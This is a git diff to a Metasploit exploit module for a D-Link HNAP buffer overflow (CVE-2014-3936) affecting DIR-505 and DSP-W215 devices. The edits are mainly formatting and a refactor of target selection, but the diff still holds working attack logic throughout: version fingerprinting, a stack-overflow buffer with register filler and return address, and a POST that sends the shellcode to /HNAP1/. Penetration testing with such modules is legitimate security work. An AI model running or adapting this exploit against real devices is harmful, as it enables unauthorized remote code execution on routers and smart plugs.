diff --git a/modules/exploits/linux/http/dlink_hnap_rop.rb b/modules/exploits/linux/http/dlink_hnap_rop.rb index 0365195f79..9da05de400 100644 --- a/modules/exploits/linux/http/dlink_hnap_rop.rb +++ b/modules/exploits/linux/http/dlink_hnap_rop.rb @@ -15,23 +15,24 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'D-Link HNAP Buffer Overflow in POST Request', 'Description' => %q{ - This module exploits an anonymous remote code execution vulnerability on different D-Link devices. - This module has been successfully tested on D-Link DIR-505 in an emulated environment. + This module exploits an anonymous remote code execution vulnerability on different + D-Link devices. This module has been successfully tested on D-Link DIR-505 in an + emulated environment. }, 'Author' => [ - 'Craig Heffner', # vulnerability discovery and initial exploit - 'Michael Messner ', # Metasploit module + 'Craig Heffner', # vulnerability discovery and initial exploit + 'Michael Messner ' # Metasploit module ], 'License' => MSF_LICENSE, - 'Platform' => ['linux'], + 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'References' => [ - [ 'CVE', '2014-3936' ], - [ 'BID', '67651' ], - [ 'URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/' ], # blog post from Craig including PoC - [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ] + ['CVE', '2014-3936'], + ['BID', '67651'], + ['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC + ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029'] ], 'Targets' => [ @@ -39,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote # Automatic targeting via fingerprinting # [ 'Automatic Targeting', { 'auto' => true } ], - [ 'D-Link DSP-W215 - v1.0', { 'Offset' => 1000000, @@ -60,7 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote ] ], 'DisclosureDate' => 'May 15 2014', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) + + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check @@ -71,71 +73,38 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && [200, 301, 302].include?(res.code) - - # trying to automatically detect a vulnerable device - if (target['auto']) - if res.body =~ /DIR-505/ && res.body =~ /1.07/ - - self.targets.each do |t| - if (t.name =~ /DIR-505.*1.07/) then - @mytarget = t - break - end - end - - elsif res.body =~ /DIR-505/ && res.body =~ /1.06/ - - self.targets.each do |t| - if (t.name =~ /DIR-505.*1.06/) then - @mytarget = t - break - end - end - - elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/ - - self.targets.each do |t| - if (t.name =~ /DSP-W215.*1.00/) then - @mytarget = t - break - end - end - - else - # no supported device found - return Exploit::CheckCode::Unknown - end - - print_status("#{peer} - Selected Target: #{@mytarget.name}") - print_good("#{peer} - detected a vulnerable device") - return Exploit::CheckCode::Detected - - # not auto-targetting ... the user is responsible + if res.body =~ /DIR-505/ && res.body =~ /1.07/ + @my_target = targets[3] if target['auto'] + return Exploit::CheckCode::Appears + elsif res.body =~ /DIR-505/ && res.body =~ /1.06/ + @my_target = targets[2] if target['auto'] + return Exploit::CheckCode::Appears + elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/ + @my_target = targets[1] if target['auto'] + return Exploit::CheckCode::Appears else - print_good("#{peer} - detected a device with unknown exploitability ... trying to exploit") return Exploit::CheckCode::Detected end end rescue ::Rex::ConnectionError - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end Exploit::CheckCode::Unknown end - def target - return @mytarget if @mytarget - super - end - def exploit print_status("#{peer} - Trying to access the vulnerable URL...") - # Use a copy of the target - @mytarget = target + @my_target = target + check_code = check - unless check == Exploit::CheckCode::Detected - fail_with(Failure::Unknown, "#{peer} - Failed to detect a vulnerable device") + unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears + fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device") + end + + if @my_target.nil? || @my_target['auto'] + fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end print_status("#{peer} - Exploiting ...") @@ -146,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote end def prepare_shellcode(cmd) - buf = rand_text_alpha_upper(@mytarget['Offset']) # Stack filler + buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler buf << rand_text_alpha_upper(4) # $s0, don't care buf << rand_text_alpha_upper(4) # $s1, don't care buf << rand_text_alpha_upper(4) # $s2, don't care buf << rand_text_alpha_upper(4) # $s3, don't care buf << rand_text_alpha_upper(4) # $s4, don't care - buf << @mytarget['Ret'] # $ra + buf << @my_target['Ret'] # $ra # la $t9, system # la $s1, 0x440000 @@ -172,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => "/HNAP1/", 'encode_params' => false, - 'data' => shellcode, + 'data' => shellcode }) return res rescue ::Rex::ConnectionError